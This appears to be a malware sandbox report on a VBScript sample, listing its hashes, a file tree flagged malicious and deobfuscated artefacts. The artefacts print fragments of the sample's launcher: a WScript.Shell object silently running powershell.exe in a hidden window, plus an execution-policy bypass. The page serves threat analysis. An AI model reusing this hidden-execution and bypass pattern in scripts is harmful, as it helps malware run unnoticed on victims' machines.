Malicious
Malicious

4ee6ac37f2c5aa8511523cc31a7e1d2b

VBScript
|
MD5: 4ee6ac37f2c5aa8511523cc31a7e1d2b
|
Size: 1.27 MB
|
text/vbscript

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
4ee6ac37f2c5aa8511523cc31a7e1d2b
Sha1
2637d5e0e64f238d0b130d73507a6de5e9476009
Sha256
1da392c740766d577b9c90edda753f04710798250ab6373ef07a095e1cb7a6ad
Sha384
f24f8eb7dcad2b254d193f9f9fc28599558682ef46a32de8432308151acfac470c87cf2bdfa247d5c95875249cb7d2b8
Sha512
7aa9649f841541896ac114ce2b59fbc4585f90607c98a006e2944070ecf09a94391ca6fc63d42ef6fa8bd80345c721945790763007d0a97b4ac80951593d5945
SSDeep
384:0iui2iui2iui2iui2iui2iui2iui2iui2iui2iui2iui2iui2iui2iui2iui2iuS:3H
TLSH
08457855DDB289117A8DE371093FCDB5A80BCD7B36EC07AAC3D026B05F14995980B8FA
File Structure
4ee6ac37f2c5aa8511523cc31a7e1d2b
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
4ee6ac37f2c5aa8511523cc31a7e1d2b.deobfuscated.vbs
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
.executed
Malicious
.subscript.vbs
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
4ee6ac37f2c5aa8511523cc31a7e1d2b
Malicious
.executed
Malicious
.subscript.vbs
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

huvuythuifhmmfol "=" "RRSClvAZKqOqSzvZuOjfhYDPFnnQbD" huvuythuifhmmfol "=" "RRSClvAZKqOqSzvZuOjfhYDPFnnQbD" execute "set RRSClvAZKqOqSzvZuOjfhYDPFnnQbD = CreateObject("WScript.Shell")" execute "RRSClvAZKqOqSzvZuOjfhYDPFnnQbD.Run "powershell.exe " "werpakoobxrqwweu" & "", 0, false"
Deobfuscated PowerShell

huvuythuifhmmfol "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" huvuythuifhmmfol "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" execute "set rrsclvazkqoqszvzuojfhydpfnnqbd = createobject("wscript.shell")" execute "rrsclvazkqoqszvzuojfhydpfnnqbd.run "powershell.exe " "werpakoobxrqwweu" & "", 0, false"
Deobfuscated PowerShell

huvuythuifhmmfol = rrsclvazkqoqszvzuojfhydpfnnqbd huvuythuifhmmfol = rrsclvazkqoqszvzuojfhydpfnnqbd execute set "rrsclvazkqoqszvzuojfhydpfnnqbd" "=" "createobject" "wscript.shell" " execute " "rrsclvazkqoqszvzuojfhydpfnnqbd.run" "powershell.exe " "werpakoobxrqwweu" & @("", 0, [Unmanaged(ErrorExpressionAst)] ,) false
Deobfuscated PowerShell

[Unmanaged(ErrorExpressionAst)] "bypass" -file $stfgl " set " huvuythuifhmmfol "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" huvuythuifhmmfol "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" execute "set" "rrsclvazkqoqszvzuojfhydpfnnqbd" "=" "createobject" "wscript.shell" " execute " "rrsclvazkqoqszvzuojfhydpfnnqbd.run" "powershell.exe " "werpakoobxrqwweu" & @({ @("", 0, [Unmanaged(ErrorExpressionAst)] [Unmanaged(ErrorExpressionAst)] ,) } ) false
4ee6ac37f2c5aa8511523cc31a7e1d2b (1.27 MB)
File Structure
4ee6ac37f2c5aa8511523cc31a7e1d2b
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
4ee6ac37f2c5aa8511523cc31a7e1d2b.deobfuscated.vbs
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
.executed
Malicious
.subscript.vbs
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
4ee6ac37f2c5aa8511523cc31a7e1d2b
Malicious
.executed
Malicious
.subscript.vbs
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

huvuythuifhmmfol "=" "RRSClvAZKqOqSzvZuOjfhYDPFnnQbD" huvuythuifhmmfol "=" "RRSClvAZKqOqSzvZuOjfhYDPFnnQbD" execute "set RRSClvAZKqOqSzvZuOjfhYDPFnnQbD = CreateObject("WScript.Shell")" execute "RRSClvAZKqOqSzvZuOjfhYDPFnnQbD.Run "powershell.exe " "werpakoobxrqwweu" & "", 0, false"

Malicious

4ee6ac37f2c5aa8511523cc31a7e1d2b > 4ee6ac37f2c5aa8511523cc31a7e1d2b.deobfuscated.vbs > [PowerShell Command]
Deobfuscated PowerShell

huvuythuifhmmfol "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" huvuythuifhmmfol "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" execute "set rrsclvazkqoqszvzuojfhydpfnnqbd = createobject("wscript.shell")" execute "rrsclvazkqoqszvzuojfhydpfnnqbd.run "powershell.exe " "werpakoobxrqwweu" & "", 0, false"

Malicious

4ee6ac37f2c5aa8511523cc31a7e1d2b > 4ee6ac37f2c5aa8511523cc31a7e1d2b.deobfuscated.vbs > [Deobfuscated PS] > [PowerShell Command]
Deobfuscated PowerShell

huvuythuifhmmfol = rrsclvazkqoqszvzuojfhydpfnnqbd huvuythuifhmmfol = rrsclvazkqoqszvzuojfhydpfnnqbd execute set "rrsclvazkqoqszvzuojfhydpfnnqbd" "=" "createobject" "wscript.shell" " execute " "rrsclvazkqoqszvzuojfhydpfnnqbd.run" "powershell.exe " "werpakoobxrqwweu" & @("", 0, [Unmanaged(ErrorExpressionAst)] ,) false

Malicious

4ee6ac37f2c5aa8511523cc31a7e1d2b > 4ee6ac37f2c5aa8511523cc31a7e1d2b.deobfuscated.vbs > [Deobfuscated PS] > [Deobfuscated PS] > [PowerShell Command]
Deobfuscated PowerShell

[Unmanaged(ErrorExpressionAst)] "bypass" -file $stfgl " set " huvuythuifhmmfol "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" huvuythuifhmmfol "=" "rrsclvazkqoqszvzuojfhydpfnnqbd" execute "set" "rrsclvazkqoqszvzuojfhydpfnnqbd" "=" "createobject" "wscript.shell" " execute " "rrsclvazkqoqszvzuojfhydpfnnqbd.run" "powershell.exe " "werpakoobxrqwweu" & @({ @("", 0, [Unmanaged(ErrorExpressionAst)] [Unmanaged(ErrorExpressionAst)] ,) } ) false

Malicious

4ee6ac37f2c5aa8511523cc31a7e1d2b > 4ee6ac37f2c5aa8511523cc31a7e1d2b.deobfuscated.vbs > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙